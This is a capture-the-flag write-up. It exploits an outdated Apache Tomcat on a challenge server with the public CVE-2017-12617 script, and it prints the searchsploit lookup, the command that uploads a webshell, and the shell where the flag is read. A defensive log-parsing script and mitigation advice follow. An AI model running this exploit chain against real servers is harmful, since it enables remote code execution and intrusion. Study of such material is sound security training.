Writeup DGA - CTF - Walter's Blog

This article describes my solution for the 100-point challenge called “Walter’s Blog”.

Introduction

A former intern developed this website several years ago.
Unfortunately, the project was poorly documented and we can no longer find the credentials to administer it...

Your tutor authorises you to try anything to regain access to this service, so be inventive!

The flag is located in the file /flag.txt.

Update: do not wrap the flag in flag{} to validate the challenge.

Start

We have a Minecraft blog with photos related to this game. By the way, who still plays this game? We know that the flag is located in the /flag.txt file. This means that we need to access the filesystem.

At the very bottom of the home page there is a link to the route /contact.html, which is a contact form. As soon as this form is submitted, an error message appears: a 404 Not Found on the route /contact, and the error page displays the version of the Tomcat server: Apache Tomcat/9.0.0.M1.

All that remains is to find an exploit for this version of Tomcat.

Exploitation

We can use searchsploit to find an exploit. Having tried several exploits without success, I only show the one we are interested in.

searchsploit tomcat
[...]
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2) | jsp/webapps/42966.py
[...]

The id of this exploit is 42966. We can use the -m flag to copy this script.

searchsploit -m 42966
  Exploit: Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)
      URL: https://www.exploit-db.com/exploits/42966
     Path: /usr/share/exploitdb/exploits/jsp/webapps/42966.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /home/ap/42966.py

Looking at the code, I notice that it’s written in Python 2. I’m on Python 3 on my machine, so to avoid making a mess I created a virtual environment.

virtualenv2 pwn
created virtual environment CPython2.7.18.final.0-64 in 208ms
  creator CPython2Posix(dest=/home/ap/pwn, clear=False, global=False)
  seeder FromAppData(download=False, pip=bundle, wheel=bundle, setuptools=bundle, via=copy, app_data_dir=/home/ap/.local/share/virtualenv)
    added seed packages: pip==20.2.4, setuptools==44.1.1, wheel==0.35.1
  activators PythonActivator,CShellActivator,FishActivator,PowerShellActivator,BashActivator
cd pwn/
source bin/activate.fish
(pwn) mv ../42966.py .
(pwn) python -V
Python 2.7.18

We can now try to run the script.

(pwn) python 42966.py
Traceback (most recent call last):
  File "42966.py", line 2, in <module>
    import requests
ImportError: No module named requests

The requests module is not found; it has to be installed.

(pwn) pip install requests
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality.
Collecting requests
  Using cached requests-2.25.0-py2.py3-none-any.whl (61 kB)
Collecting certifi>=2017.4.17
  Using cached certifi-2020.11.8-py2.py3-none-any.whl (155 kB)
Collecting chardet<4,>=3.0.2
  Using cached chardet-3.0.4-py2.py3-none-any.whl (133 kB)
Collecting urllib3<1.27,>=1.21.1
  Using cached urllib3-1.26.2-py2.py3-none-any.whl (136 kB)
Collecting idna<3,>=2.5
  Using cached idna-2.10-py2.py3-none-any.whl (58 kB)
Installing collected packages: certifi, chardet, urllib3, idna, requests
Successfully installed certifi-2020.11.8 chardet-3.0.4 idna-2.10 requests-2.25.0 urllib3-1.26.2
WARNING: You are using pip version 20.2.4; however, version 20.3 is available.
You should consider upgrading via the '/home/ap/pwn/bin/python -m pip install --upgrade pip' command.

That’s better now.

(pwn) python 42966.py --help
Usage:


   _______      ________    ___   ___  __ ______     __ ___   __ __ ______
  / ____\ \    / /  ____|  |__ \ / _ \/_ |____  |   /_ |__ \ / //_ |____  |
 | |     \ \  / /| |__ ______ ) | | | || |   / /_____| |  ) / /_ | |   / /
 | |      \ \/ / |  __|______/ /| | | || |  / /______| | / / '_ \| |  / /
 | |____   \  /  | |____    / /_| |_| || | / /       | |/ /| (_) | | / /
  \_____|   \/   |______|  |____|\___/ |_|/_/        |_|____\___/|_|/_/




./cve-2017-12617.py [options]

options:

-u ,--url [::] check target url if it's vulnerable
-p,--pwn  [::] generate webshell and upload it
-l,--list [::] hosts list

[+]usage:

./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt


[@intx0x80]



Options:
  -h, --help      show this help message and exit
  -u U, --url=U   Website Url
  -p P, --pwn=P   generate webshell and upload it
  -l L, --list=L  hosts File

Reading the help, we understand that the script should be used in the following way.

(pwn) python 42966.py -u http://waltersblog3.chall.malicecyber.com/ -p pwn



   _______      ________    ___   ___  __ ______     __ ___   __ __ ______
  / ____\ \    / /  ____|  |__ \ / _ \/_ |____  |   /_ |__ \ / //_ |____  |
 | |     \ \  / /| |__ ______ ) | | | || |   / /_____| |  ) / /_ | |   / /
 | |      \ \/ / |  __|______/ /| | | || |  / /______| | / / '_ \| |  / /
 | |____   \  /  | |____    / /_| |_| || | / /       | |/ /| (_) | | / /
  \_____|   \/   |______|  |____|\___/ |_|/_/        |_|____\___/|_|/_/



[@intx0x80]


Uploading Webshell .....
$ 

We have a shell! So let’s display the flag.txt file.

$ cat flag.txt
flag{i4lW4y5UpD4T3Y0urt0mC@}

We managed to access the filesystem and retrieve the flag to validate this challenge.
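From the defender's side, the exploit used above (CVE-2017-12617) relies on HTTP write methods against Tomcat's DefaultServlet, and every such request lands in the access log. The following Python script is an added example, not part of the original writeup or of the exploit script: it parses Tomcat common-format access log lines and flags PUT/DELETE requests, singling out a PUT of a .jsp resource as the webshell-upload pattern. The hosts, paths and timestamps in SAMPLE_LOG are constructed, not taken from the challenge server.

```python
import re
from collections import namedtuple

# Tomcat "common" access log pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

Finding = namedtuple("Finding", "host time method path status reason")

# Methods that modify the webroot. A PUT whose target is a JSP is the
# CVE-2017-12617 pattern (DefaultServlet running with readonly=false).
WRITE_METHODS = {"PUT", "DELETE"}

def parse_line(line):
    """Return the fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def analyse(lines):
    """Return a Finding for every write-method request, tagged with why it matters."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] not in WRITE_METHODS:
            continue
        status = int(rec["status"])
        # substring match rather than endswith: the request path is not
        # guaranteed to end exactly in ".jsp"
        if rec["method"] == "PUT" and ".jsp" in rec["path"].lower():
            reason = "PUT of a JSP resource (webshell upload pattern)"
        else:
            reason = "write method against the webroot"
        if 200 <= status < 300:
            reason += "; server accepted it (2xx)"
        findings.append(Finding(rec["host"], rec["time"], rec["method"],
                                rec["path"], status, reason))
    return findings

# Constructed sample lines (hypothetical hosts and names, not from the challenge)
SAMPLE_LOG = """\
198.51.100.7 - - [15/Nov/2020:14:01:58 +0000] "GET /contact.html HTTP/1.1" 200 2048
198.51.100.7 - - [15/Nov/2020:14:02:03 +0000] "POST /contact HTTP/1.1" 404 1110
198.51.100.7 - - [15/Nov/2020:14:02:11 +0000] "PUT /demo.jsp HTTP/1.1" 201 -
198.51.100.7 - - [15/Nov/2020:14:02:12 +0000] "GET /demo.jsp HTTP/1.1" 200 64
203.0.113.9 - - [15/Nov/2020:14:05:40 +0000] "PUT /upload/notes.txt HTTP/1.1" 403 -
"""
FINDINGS = analyse(SAMPLE_LOG.splitlines())
```

The mitigation is the one the flag hints at: upgrade Tomcat, and keep the DefaultServlet's readonly init-param at its default of true in conf/web.xml so PUT requests are rejected outright.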